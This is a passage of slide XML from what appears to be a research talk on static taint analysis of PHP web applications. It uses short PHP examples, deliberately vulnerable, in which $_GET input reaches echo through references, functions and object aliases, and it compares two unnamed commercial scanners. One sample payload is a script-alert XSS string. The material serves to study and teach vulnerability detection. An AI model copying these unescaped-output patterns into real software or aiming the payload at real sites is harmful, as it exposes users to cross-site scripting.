                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   $a=“test”;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// $a: untainted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$b=&amp;$a;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>//  $a, $b: untainted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   $a= $_GET[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”];  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// $a ,$b: tainted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   echo $b;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// XSS vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285722" y="2416726"/>
            <a:ext cx="1500198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/>
              <a:t>PHP Code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文字方塊 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4988966" y="2416726"/>
            <a:ext cx="1440423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/>
              <a:t>PHP Code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文字方塊 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5000628" y="2786058"/>
            <a:ext cx="3857652" cy="258532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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$a="test";     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// $a: untainted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$b=&amp;$a;        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// $a, $b: untainted  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>grade();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>function grade()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$a=$_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"]; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// $a , $b: tainted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echo $b;   ?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// XSS vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="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214283" y="5429266"/>
            <a:ext cx="3000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2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Tool A: false negative </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Tool B: true positive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4929191" y="5429266"/>
            <a:ext cx="3000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2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Tool A:  false negative </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Tool B:  false negative</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文字方塊 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214282" y="6162281"/>
            <a:ext cx="85725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 smtClean="0"/>
              <a:t>Note: Tool A and Tool B are two popular commercial code analysis tools.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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None of the existing tools (that we have tested) handles aliases between objects. </a:t>
            </a:r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Challenges: Alias Analysis (cont.)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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2440524" y="2786058"/>
            <a:ext cx="3357586" cy="35394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sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>class car{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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> $color;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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set_color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($c){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  $this-&gt;color = $c;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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new car;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set_color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("blue");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a_mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = &amp;$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a_mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>set_color</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( "&lt;script&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>')&lt;/script&gt;“);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mycar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-&gt;color."&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?&gt;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2428860" y="2416726"/>
            <a:ext cx="1654737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/>
              <a:t>PHP Code</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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8109" y="5286388"/>
            <a:ext cx="1309687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Challenges: Strings and Numbers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  <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>To exploit the XSS vulnerability at line 8, we have to generate input strings satisfying the conditions at lines 1, 2, and 7, which involve both</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> constraints.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857224" y="1214424"/>
            <a:ext cx="757242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 smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1  if($_GET[‘mode’] == "add"){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2     if(!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($_GET[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’]) || !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($_GET[‘poster’])){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3          exit;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5      $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>my_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = $_GET[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>6      $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>my_poster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = $_GET[‘poster’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>7      if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>my_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) &gt; 100 &amp;&amp; !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ereg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script",$my_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>8          echo "Thank you for posting the message $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>my_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>9      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>11  …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43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Challenges: A Theoretical Limitation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Consider the class of programs with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
